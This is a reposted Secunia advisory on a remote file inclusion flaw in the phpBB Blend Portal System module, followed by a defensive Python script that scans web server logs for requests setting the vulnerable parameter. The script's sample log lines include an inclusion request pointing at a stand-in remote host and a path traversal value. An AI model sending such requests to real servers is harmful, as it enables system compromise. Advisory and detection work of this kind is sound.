phpBB Blend Portal System Module

Posted on Wednesday, May 31, 2006 @ 07:27:52 UTC in Security
by Raven

TITLE: phpBB Blend Portal System Module "phpbb_root_path" File Inclusion

SECUNIA ADVISORY ID: SA20350

VERIFY ADVISORY: http://secunia.com/advisories/20350/

CRITICAL: Highly critical

IMPACT: System access

WHERE: From remote

SOFTWARE: Blend Portal System 1.x (module for phpBB)
http://secunia.com/product/10215/

DESCRIPTION: Mustafa Can Bjorn has reported a vulnerability in the Blend Portal System module for phpBB, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "phpbb_root_path" parameter in blend_data/blend_common.php is not properly verified before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been reported in version 1.2.0. Other versions may also be affected.
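
To review web server logs for requests that set this parameter on the affected script, the following check can be used. It is an added example, not part of the Secunia advisory or the vendor's fix; it assumes Apache common/combined log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script and parameter named in the advisory.
TARGET = "blend_data/blend_common.php"
PARAM = "phpbb_root_path"
# Client, request target and status from a common/combined-format line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation addresses, reserved .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/May/2006:07:01:02 +0000] "GET /forum/viewtopic.php?t=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/May/2006:07:03:44 +0000] "GET /forum/blend_data/'
    'blend_common.php?phpbb_root_path=http://host.invalid/ HTTP/1.0" 200 312',
    '203.0.113.9 - - [31/May/2006:07:05:10 +0000] "GET /forum/blend_data/'
    'blend_common.php?phpbb%5Froot%5Fpath=..%2F..%2Ftmp%2F HTTP/1.1" 500 0',
]

def classify(value):
    """Label the supplied value: remote URL, local path, or other."""
    if re.match(r"[a-z][a-z0-9+.\-]*://", value, re.I):
        return "remote"
    if value.startswith(("/", "\\")) or ".." in value or re.match(r"[a-z]:[\\/]", value, re.I):
        return "local"
    return "other"

def find_hits(lines):
    """Return (client, status, kind) for each request that sets PARAM on TARGET.

    Access logs record only the query string; with register_globals the variable
    can also arrive in a POST body or cookie, which this check cannot see.
    """
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not unquote(url.path).lower().endswith(TARGET):
            continue
        # parse_qsl percent-decodes names and values, so encoded forms match too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == PARAM:
                hits.append((client, int(status), classify(value)))
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```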

SOLUTION: Apply code changes as instructed by the vendor. http://phpbb-tweaks.com/topics.html-p-17623#17623

PROVIDED AND/OR DISCOVERED BY: Mustafa Can Bjorn

ORIGINAL ADVISORY: http://www.nukedx.com/?viewdoc=41
 
 